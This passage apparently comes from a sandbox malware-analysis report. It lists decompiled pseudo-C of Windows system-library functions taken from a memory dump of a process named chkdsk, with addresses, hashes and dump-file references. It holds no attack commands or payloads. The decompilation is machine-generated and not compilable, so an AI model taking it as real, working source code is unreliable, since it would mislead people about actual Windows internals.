					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E04DCBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E04DCA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E04DCA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04DA4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                      0x04d91b8f
                                                      0x04d91b9a
                                                      0x04d91b9c
                                                      0x04d91b9e
                                                      0x04d91ba3
                                                      0x04de7010
                                                      0x04de7010
                                                      0x00000000
                                                      0x04d91ba9
                                                      0x04d91ba9
                                                      0x04d91bae
                                                      0x00000000
                                                      0x04d91bc5
                                                      0x04d91bca
                                                      0x04d91bcf
                                                      0x04d91bd0
                                                      0x04d91bd1
                                                      0x04d91bd2
                                                      0x04d91bd6
                                                      0x04d91bdc
                                                      0x04d91be0
                                                      0x04de6ffc
                                                      0x04de7000
                                                      0x00000000
                                                      0x04de7006
                                                      0x04de7009
                                                      0x04de7009
                                                      0x04d91be6
                                                      0x04d91bec
                                                      0x04d91c0b
                                                      0x04d91c0b
                                                      0x04d91c0c
                                                      0x04d91c11
                                                      0x04d91c12
                                                      0x04d91c15
                                                      0x04d91c1b
                                                      0x04d91c1f
                                                      0x04d91c31
                                                      0x04d91c33
                                                      0x04de7026
                                                      0x04de7026
                                                      0x04d91c21
                                                      0x04d91c24
                                                      0x04d91c24
                                                      0x04d91bee
                                                      0x04d91bee
                                                      0x04d91bf2
                                                      0x04d91c3a
                                                      0x04d91bf4
                                                      0x04d91bf4
                                                      0x04d91c05
                                                      0x04d91c05
                                                      0x04d91c09
                                                      0x04d91c3e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d91c09
                                                      0x04d91bec
                                                      0x04d91be0
                                                      0x04d91bae
                                                      0x04d91c2e

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: WindowsExcludedProcs
                                                      • API String ID: 0-3583428290
                                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction ID: 844a98b2a518c008d6addcf3593420f8bef13df8d5e0a687037e3472a22b14f4
                                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction Fuzzy Hash: 9A21B37670122AABEF22AA969840F6FB7BDEB41754F094426B904DB204E630FD0197A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DAF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04DAF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                      0x04daf71d
                                                      0x04daf722
                                                      0x04daf726
                                                      0x04df4770
                                                      0x04daf765
                                                      0x04daf769
                                                      0x04daf769
                                                      0x04daf732
                                                      0x04df477a
                                                      0x00000000
                                                      0x04df477a
                                                      0x04daf738
                                                      0x04daf73a
                                                      0x04daf73c
                                                      0x04daf73f
                                                      0x04daf746
                                                      0x04daf778
                                                      0x04daf7a9
                                                      0x04daf7a9
                                                      0x04daf754
                                                      0x04daf75a
                                                      0x04daf75d
                                                      0x04daf75f
                                                      0x04daf761
                                                      0x04daf76f
                                                      0x04daf771
                                                      0x04daf771
                                                      0x04daf76f
                                                      0x04daf763
                                                      0x00000000
                                                      0x04daf763
                                                      0x04daf77d
                                                      0x04daf7a3
                                                      0x04daf7a5
                                                      0x00000000
                                                      0x04daf7a5
                                                      0x04daf77f
                                                      0x04daf782
                                                      0x04daf784
                                                      0x04daf786
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04daf788
                                                      0x04daf748
                                                      0x04daf74d
                                                      0x04daf78d
                                                      0x04daf793
                                                      0x04daf7b7
                                                      0x04daf7bc
                                                      0x00000000
                                                      0x04daf7bc
                                                      0x04daf798
                                                      0x00000000
                                                      0x00000000
                                                      0x04daf79d
                                                      0x04daf7b0
                                                      0x00000000
                                                      0x04daf7b0
                                                      0x04daf79f
                                                      0x00000000
                                                      0x04daf74f
                                                      0x04daf74f
                                                      0x00000000
                                                      0x04daf74f

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx
                                                      • API String ID: 0-89312691
                                                      • Opcode ID: 7f6adc2d3f057e618d5479bf7e032537c62684acdc31acbe683b95a61e5c047a
                                                      • Instruction ID: 61b2ede180c8325058d8c5bbeb4a035c5aed61c50efcd99f7e4ec3a1f2a20e5e
                                                      • Opcode Fuzzy Hash: 7f6adc2d3f057e618d5479bf7e032537c62684acdc31acbe683b95a61e5c047a
                                                      • Instruction Fuzzy Hash: AB11BF353046528BEB744F1DD8907367296BB96764F2549AEE4A2CB391EBB0F8618380
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E38DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E04E38DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4e60d50);
				E04DDD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04E15720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L04DDDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L04DDDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E04DDD130(_t34, _t39, _t40);
			}





                                                      0x04e38df1
                                                      0x04e38df1
                                                      0x04e38df1
                                                      0x04e38df1
                                                      0x04e38df1
                                                      0x04e38df1
                                                      0x04e38df3
                                                      0x04e38df8
                                                      0x04e38dfd
                                                      0x04e38e00
                                                      0x04e38e0e
                                                      0x04e38e2a
                                                      0x04e38e36
                                                      0x04e38e38
                                                      0x04e38e3c
                                                      0x04e38e46
                                                      0x04e38e46
                                                      0x04e38e36
                                                      0x04e38e50
                                                      0x04e38e56
                                                      0x04e38e59
                                                      0x04e38e5c
                                                      0x04e38e60
                                                      0x04e38e67
                                                      0x04e38e6d
                                                      0x04e38e73
                                                      0x04e38e74
                                                      0x04e38eb1
                                                      0x04e38ebd

                                                      Strings
                                                      • Critical error detected %lx, xrefs: 04E38E21
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Critical error detected %lx
                                                      • API String ID: 0-802127002
                                                      • Opcode ID: 10621465bfc0fca3abc27a8200cab1525b804cbba7827bda7eed0d1d9ef412d9
                                                      • Instruction ID: be3ad647753b2405a4d23e40f279a7523f6e528edaad100de1bf544ba44c068e
                                                      • Opcode Fuzzy Hash: 10621465bfc0fca3abc27a8200cab1525b804cbba7827bda7eed0d1d9ef412d9
                                                      • Instruction Fuzzy Hash: 34115771E44348DBEF26DFA589097DCBBB1BB04319F20521EE0696B282D2302601CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E1FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04E1FF60
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                      • API String ID: 0-1911121157
                                                      • Opcode ID: 14f08958ca8dc95839fe024b9b9c2a54033ce2e7ab4911d860afa6727639890c
                                                      • Instruction ID: 8161b0f894d6c7229a9b476305ac60e60b5263127d3df5daeaa9c12c209877a9
                                                      • Opcode Fuzzy Hash: 14f08958ca8dc95839fe024b9b9c2a54033ce2e7ab4911d860afa6727639890c
                                                      • Instruction Fuzzy Hash: 4411C071A90144EFEF26DF50C949F98BBB2FF48719F148094E5096B2B1C779B940DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E55BA5 Relevance: .6, Instructions: 592COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 88%
                                                      			E04E55BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4e61178);
				E04DDD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04E54C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E04DCD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04E55542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x4e760e8;
								if( *0x4e760e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x4e760e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04DC9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04DC6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E04DCF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E04DCF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E04DCF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E04DCFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E04DCFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E04DCF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E04DCF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
